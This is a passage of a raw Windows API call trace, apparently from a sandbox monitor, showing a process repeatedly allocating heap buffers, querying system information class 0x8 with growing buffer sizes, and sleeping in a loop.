[0298.254] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0298.254] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.255] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0298.258] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0298.258] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.259] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0298.259] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0298.259] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.260] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0298.260] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.260] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.260] Sleep (dwMilliseconds=0x110) [0298.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0298.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0298.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0298.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0298.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0298.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0298.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.270] Sleep (dwMilliseconds=0x110) [0298.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0298.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0298.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0298.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0298.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0298.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0298.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0298.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0298.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.285] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.285] Sleep (dwMilliseconds=0x110) [0298.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0298.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0298.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0298.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0298.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0298.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0298.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0298.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0298.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.300] Sleep (dwMilliseconds=0x110) [0298.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0298.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0298.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0298.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0298.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0298.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0298.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0298.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0298.313] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.313] Sleep (dwMilliseconds=0x110) [0298.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0298.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0298.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0298.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0298.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0298.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0298.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.333] Sleep (dwMilliseconds=0x110) [0298.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0298.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0298.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0298.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0298.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0298.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0298.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.346] Sleep (dwMilliseconds=0x110) [0298.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0298.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0298.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0298.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0298.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0298.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0298.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0298.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0298.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.364] Sleep (dwMilliseconds=0x110) [0298.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0298.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0298.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0298.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0298.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0298.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0298.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.380] Sleep (dwMilliseconds=0x110) [0298.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0298.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0298.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0298.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0298.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0298.393] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0298.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0298.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.394] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0298.394] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.395] Sleep (dwMilliseconds=0x110) [0298.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0298.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0298.410] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0298.410] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.411] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0298.413] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0298.413] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0298.414] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0298.414] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.415] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0298.415] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.416] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.416] Sleep (dwMilliseconds=0x110) [0298.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0298.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.419] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0298.419] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0298.419] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0298.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0298.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0298.423] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0298.423] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0298.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.424] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.424] Sleep (dwMilliseconds=0x110) [0298.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0298.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0298.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0298.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0298.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0298.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0298.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.441] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.442] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.442] Sleep (dwMilliseconds=0x110) [0298.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0298.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.454] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0298.454] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0298.454] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0298.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0298.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0298.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0298.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0298.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.456] Sleep (dwMilliseconds=0x110) [0298.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0298.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, 